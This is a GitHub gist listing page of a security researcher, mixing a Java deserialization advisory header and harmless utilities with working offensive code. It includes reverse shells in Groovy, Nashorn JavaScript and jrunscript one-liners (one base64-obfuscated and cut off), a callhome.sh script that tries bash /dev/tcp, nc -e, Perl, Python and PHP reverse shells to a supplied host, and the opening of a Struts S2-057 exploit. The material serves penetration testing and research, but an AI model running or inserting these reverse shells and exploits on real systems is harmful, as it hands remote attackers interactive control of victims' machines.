Skip to content

Instantly share code, notes, and snippets.

Avatar

Chris Frohoff frohoff

  • San Diego, CA
View GitHub Profile
@frohoff
frohoff / JAVA-ADVISORY.md
Last active Nov 27, 2021
Java 7u21 Security Advisory
View JAVA-ADVISORY.md

Security Advisory – Java SE

Chris Frohoff – Qualcomm Information Security and Risk Management

Introduction

  • Affected Product(s): Java SE 6, Java SE 7
  • Fixed in: Java SE 7u25 (2013-06-18), Java SE 8 (2014-03-18)
  • Vendor Contact: secalert_us@oracle.com
  • Vulnerability Type: Unsafe Object Deserialization
@frohoff
frohoff / revsh.groovy
Created Mar 2, 2016
Pure Groovy/Java Reverse Shell
View revsh.groovy
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
@frohoff
frohoff / JVM_POST_EXPLOIT.md
Last active Aug 1, 2021
JVM Post-Exploitation One-Liners
View JVM_POST_EXPLOIT.md

Nashorn / Rhino:

  • Reverse Shell
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'
  • Reverse Shell (Base-64 encoded)
$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V
@frohoff
frohoff / revsh.js
Created Mar 22, 2016
Nashorn Javascript Reverse Shell
View revsh.js
var host="localhost";
var port=8044;
var cmd="cmd.exe";
var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();
@frohoff
frohoff / callhome.sh
Last active Oct 26, 2020
Shell script that attempts multiple methods for creating a reverse shell
View callhome.sh
#!/bin/bash
host=$1
port=$2
bash -i >& /dev/tcp/$host/$port 0>&1
nc -e /bin/sh $host $port
perl -e "use Socket;\$i=\"$host\";\$p=$port;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"
python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$host\",$port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);"
php -r "\$sock=fsockopen(\"$host\",$port);exec(\"/bin/sh -i <&3 >&3 2>&3\");"
@frohoff
frohoff / 14seg.py
Created Dec 17, 2018
14 segment display ascii renderer
View 14seg.py
#!/usr/bin/python
# $ echo bcefgG il | python 14seg.py
#
# | | |
# -- --
# | | |
import string
import sys
@frohoff
frohoff / s2-057.py
Created Aug 23, 2018
Struts S2-057 PoC exploit
View s2-057.py
# some ideas from https://mp.weixin.qq.com/s/iBLrrXHvs7agPywVW7TZrg
import sys
import urllib
import urllib2
if len(sys.argv) != 3:
print 'Usage: %s [url] [command]' % sys.argv[0]
exit(1)
@frohoff
frohoff / README.md
Last active Apr 30, 2018 — forked from ofabry/README.md
UserScript: Github Links to Star Badges
@frohoff
frohoff / docker-compose-commands.txt
Created Sep 8, 2017
docker-compose command usage/options
View docker-compose-commands.txt
$ docker-compose 2>&1 | grep -E ' [a-z]+ ' | awk '{print $1}' | xargs -n1 -I{} docker-compose {} -h 2>&1 | grep -E '^\s*(Usage:|-+[a-z])'
Usage: build [options] [--build-arg key=val...] [SERVICE...]
--force-rm Always remove intermediate containers.
--no-cache Do not use cache when building the image.
--pull Always attempt to pull a newer version of the image.
--build-arg key=val Set build-time variables for one service.
Usage: bundle [options]
--push-images Automatically push images for any services
-o, --output PATH Path to write the bundle file to.
Usage: config [options]
@frohoff
frohoff / versions.yml
Last active Sep 8, 2017
travis-ci osx image jdk versions
View versions.yml
# https://github.com/frohoff/travistest
# https://github.com/travis-ci/docs-travis-ci-com/issues/593
# https://docs.travis-ci.com/user/reference/osx/#OS-X-Version
osx_image: xcode9 # oraclejdk8 1.8.0_112-b16
osx_image: xcode8.3 # oraclejdk8 1.8.0_112-b16
osx_image: xcode8.2 # oraclejdk8 1.8.0_112-b16
osx_image: xcode8.1 # oraclejdk8 1.8.0_112-b16
osx_image: xcode8 # oraclejdk8 1.8.0_92-b14
osx_image: xcode7.3 # oraclejdk8 1.8.0_74-b02
osx_image: xcode7.2 # oraclejdk8 1.8.0_66-b17